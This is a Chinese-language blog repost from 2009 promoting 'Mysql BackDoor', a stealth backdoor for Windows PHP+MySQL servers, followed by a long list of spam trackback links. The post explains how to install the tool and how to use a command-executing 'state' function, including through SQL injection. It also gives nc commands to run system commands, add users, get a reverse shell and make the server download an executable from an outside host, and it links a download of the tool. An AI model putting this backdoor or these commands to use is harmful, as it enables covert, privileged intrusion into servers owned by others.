RSS

Mysql BackDoor

This entry was posted on Jul 24 2009

來源:普瑞斯特

Mysql BackDoor是一款針對PHP+Mysql服務器開發的後門,後門安裝後為Mysql增加一個可以執行系統命令的"state"函數,並且隨Mysql進程啟動一個基於Dll的嗅探型後門,從而巧妙地實現了無端口,無進程,無服務的穿牆木馬.程序在WINXP,WIN2003+MYSQL5.0.X下通過.
安裝將Mysql.php傳到PHP服務器上,依填上相應的Host-User-Password-DB後,點擊"自動安裝Mysql BackDoor"
安裝成功後,Mysql上便會增加一個"state"函數,同時利用Mysql進程運行一個基於嗅探的後門. 這個後門在Windows下擁有與Mysql一樣的系統權限.
使用state函數
State 函數實際是一個和PHP的"system()"功能相同的函數,可以用來執行系統命令.在"請輸入SQL命令:"處填寫要執行的mysql語句,如" select state("net user nohack /add")",點擊"執行SQL語句"後,便會得到運行結果.
使用基於Sniff的後門有了state函數,即使WebShell丟了,只要服務器上有SQL注入點,我們就能通過注入".php?id=1 and state('net user')"的方法在服務器上執行命令.但是如果注入點都沒有了呢?我們仍然調用基於Sniff的後門控制服務器.向服務器開放的任意端口發送以"Mysql-"開頭的數據包,便能調用這個Sniff的後門,如:
1.運行系統命令: nc ip 80->回車->Mysql-cmd /c net user abc /add>c:/log.txt!(注意:最後的"!"不可省略)
2.讓服務器反彈Shell到本機20082端口:先運行nc –lp 20082監聽本機的20082端口,再nc ip 80->回車->Mysql-c-->回車
3.讓服務器下載文件:nc ip 80->回車->Mysql-http://www.x.com/door.exe -c mydoor.exe!(注意:最後的"!"不可省略)
除了發送"Mysql-c-",其他的命令是沒有回顯的,但相應的命令已經在服務器上運行了.
卸載在Mysql上運行"drop function state"便可卸載,但同時會造成mysql進程退出,重啟後恢復正常.

Mysql BackDoor下載

,
學·武功秘籍
Chinese (Simplified) flagItalian flagKorean flagChinese (Traditional) flagPortuguese flagEnglish flagGerman flagFrench flagSpanish flagJapanese flagArabic flagRussian flagGreek flagDutch flagBulgarian flagCzech flagCroatian flagDanish flagFinnish flagHindi flagPolish flagRomanian flagSwedish flagNorwegian flagCatalan flagFilipino flagHebrew flagIndonesian flagLatvian flagLithuanian flagSerbian flagSlovak flagSlovenian flagUkrainian flagVietnamese flagAlbanian flagEstonian flagGalician flagMaltese flagThai flagTurkish flagHungarian flag

  1. 154 Trackback(s)

  2. Nov 5, 2011: foundation repairs Pleasant Hill OH
  3. Nov 6, 2011: Bamboo Roman Shades
  4. Nov 10, 2011: improve eyesight
  5. Nov 11, 2011: buy youtube views
  6. Nov 11, 2011: relocating to the philippines
  7. Nov 11, 2011: what is data mining
  8. Nov 11, 2011: agencia digital
  9. Nov 12, 2011: sua thanh trung
  10. Nov 12, 2011: free football picks
  11. Nov 14, 2011: How to save my marriage
  12. Nov 15, 2011: cheez it coupons
  13. Nov 15, 2011: Duncan Hines coupon
  14. Nov 15, 2011: dangerous power g4
  15. Nov 15, 2011: male extenders
  16. Nov 16, 2011: How to SEO
  17. Nov 16, 2011: Cheap Bidet Faucets
  18. Nov 16, 2011: hardwood flooring installation CT
  19. Nov 16, 2011: ecover software
  20. Nov 16, 2011: seo cardif
  21. Nov 16, 2011: moving long distance
  22. Nov 16, 2011: Minecraft Cheats
  23. Nov 16, 2011: Powerwing caster scooter
  24. Nov 17, 2011: nicorette coupons
  25. Nov 17, 2011: dining solutions direct
  26. Nov 18, 2011: Cheap Fires
  27. Nov 19, 2011: liberty reserve
  28. Nov 19, 2011: Car Hire Larnaca
  29. Nov 19, 2011: online public relations
  30. Nov 20, 2011: Frontierville
  31. Nov 21, 2011: Yaz Lawsuit
  32. Nov 21, 2011: cinetube
  33. Nov 21, 2011: Locksmith Wolverhampton
  34. Nov 22, 2011: amazon coupon code
  35. Nov 22, 2011: boating
  36. Nov 22, 2011: cheap ink toner cartridges
  37. Nov 23, 2011: team build
  38. Nov 23, 2011: online casino uk
  39. Nov 23, 2011: watch Greys Anatomy online
  40. Nov 24, 2011: work injury claims
  41. Nov 24, 2011: personal injury no win no fee
  42. Nov 24, 2011: fentanyl addiction
  43. Nov 29, 2011: brachial plexus injury
  44. Nov 29, 2011: recipes for smoothies
  45. Nov 29, 2011: wild boar pigs
  46. Nov 30, 2011: best xbox sports game
  47. Dec 2, 2011: online shopping
  48. Dec 3, 2011: lesbian porn
  49. Dec 3, 2011: Sua tuoi
  50. Dec 4, 2011: Amarillo Bricklayer
  51. Dec 4, 2011: online shopping
  52. Dec 5, 2011: dildos
  53. Dec 6, 2011: laminate flooring CT
  54. Dec 6, 2011: Car Batteries
  55. Dec 19, 2011: Carrier Parts
  56. Dec 24, 2011: technology
  57. Dec 27, 2011: Olive Garden coupons
  58. Dec 27, 2011: uk lotto
  59. Dec 28, 2011: private krankenversicherung
  60. Dec 28, 2011: private krankenversicherung
  61. Dec 28, 2011: video production charlottesville va
  62. Jan 2, 2012: new york wedding photography
  63. Jan 3, 2012: xbox live online codes
  64. Jan 3, 2012: wedding photography
  65. Jan 5, 2012: Montgomery County Virus Removal
  66. Jan 10, 2012: my top fans facebook application
  67. Jan 10, 2012: site
  68. Jan 14, 2012: roof repair in Xenia OH
  69. Jan 19, 2012: tiu 1
  70. Jan 30, 2012: igun
  71. Feb 3, 2012: Domain Brokerage
  72. Feb 5, 2012: supermarket injury
  73. Feb 5, 2012: loss of amenity
  74. Feb 5, 2012: southern dunes
  75. Feb 6, 2012: http://www.reformy.cz/zpravy/ukradena-ustava/
  76. Feb 6, 2012: whiplash injury
  77. Feb 7, 2012: nba picks
  78. Feb 9, 2012: Bellimbusto testo
  79. Feb 9, 2012: Bellimbusto finale
  80. Feb 10, 2012: good life quotes
  81. Feb 10, 2012: garage door installation Lighthouse Hill NY
  82. Feb 12, 2012: Warlock Pvp
  83. Feb 17, 2012: raha
  84. Feb 18, 2012: Buy Dosimeter
  85. Feb 18, 2012: ch products pro throttle usb
  86. Feb 18, 2012: bauernhofpornos
  87. Feb 19, 2012: Best Canon Macro Lens
  88. Feb 21, 2012: gatsby wax
  89. Feb 21, 2012: How to keep fit
  90. Feb 22, 2012: Catch of the day
  91. Feb 22, 2012: hair extensions
  92. Feb 22, 2012: Gifts for grandma
  93. Feb 22, 2012: Mens leather jackets
  94. Feb 23, 2012: Best mattresses
  95. Feb 23, 2012: rose gold engagement rings
  96. Feb 24, 2012: Silver melt value
  97. Feb 24, 2012: freefav.com
  98. Feb 24, 2012: Fussball Sportwetten
  99. Feb 25, 2012: cute dog collars
  100. Feb 26, 2012: romance ebooks
  101. Feb 26, 2012: Paladin Pvp Guide
  102. Feb 27, 2012: kupferpreise
  103. Feb 28, 2012: senuke x
  104. Mar 1, 2012: psychics
  105. Mar 2, 2012: temperature logger
  106. Mar 4, 2012: Aline
  107. Mar 6, 2012: Allison
  108. Mar 6, 2012: sobres impresos
  109. Mar 7, 2012: Buy Proxies
  110. Mar 7, 2012: escarpins femme
  111. Mar 8, 2012: hiking stores
  112. Mar 8, 2012: mazda spare parts
  113. Mar 10, 2012: Scuba
  114. Mar 10, 2012: campers world
  115. Mar 11, 2012: günstige Werbeartikel
  116. Mar 12, 2012: Mauritius Holidays
  117. Mar 12, 2012: free psychic chat
  118. Mar 13, 2012: free games
  119. Mar 20, 2012: Jobs
  120. Mar 20, 2012: kundenberichte digitalkameras
  121. Mar 20, 2012: palatin
  122. Mar 21, 2012: NBA Picks
  123. Mar 22, 2012: Daily Deals
  124. Mar 23, 2012: dresses for a wedding guest
  125. Mar 23, 2012: Kinderauto
  126. Mar 23, 2012: Kleinanzeigen
  127. Mar 23, 2012: Hundefutter
  128. Mar 23, 2012: Putas Madrid
  129. Mar 24, 2012: cylinder calculator
  130. Mar 28, 2012: psychic readings
  131. Mar 30, 2012: caravan nz
  132. Apr 6, 2012: Gratio
  133. Apr 7, 2012: zoli
  134. Apr 7, 2012: magepvp
  135. Apr 7, 2012: Hunter
  136. Apr 7, 2012: parfüm
  137. Apr 7, 2012: Weekly Deals
  138. Apr 7, 2012: Kek Tarifleri
  139. Apr 8, 2012: bitkisel ürünler
  140. Apr 9, 2012: masallar
  141. Apr 10, 2012: gardeningrecipe
  142. Apr 16, 2012: เพลงใหม่ล่าสุด ฝน
  143. Apr 18, 2012: double glazing retrofit
  144. Apr 18, 2012: Monster Headphones
  145. Apr 19, 2012: Cheap Monster Beats
  146. Apr 20, 2012: Robb
  147. Apr 22, 2012: Log Cabins Loch Lomond
  148. Apr 22, 2012: Feminine Tattoos
  149. Apr 22, 2012: Affordable Arts
  150. Apr 22, 2012: Dynamic Roof Insulation
  151. Apr 22, 2012: Marketing Automation Software
  152. May 1, 2012: car insurance quotes
  153. May 5, 2012: how do i obtain a free credit report
  154. May 10, 2012: cash advance
  155. May 13, 2012: ampelopsidin bruckled adulation

You must be logged in to post a comment.